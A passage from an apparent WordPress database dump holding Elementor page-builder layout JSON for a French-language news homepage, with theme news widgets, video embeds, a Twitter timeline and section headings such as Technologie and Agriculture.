\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"etkgpka\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"qhy9zif\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tp92281\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-carousel-slider-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1541,517,'_elementor_version','0.4'),(1542,517,'_elementor_css','a:3:{s:4:\"time\";i:1508933794;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1544,518,'_elementor_edit_mode','builder'),(1545,518,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px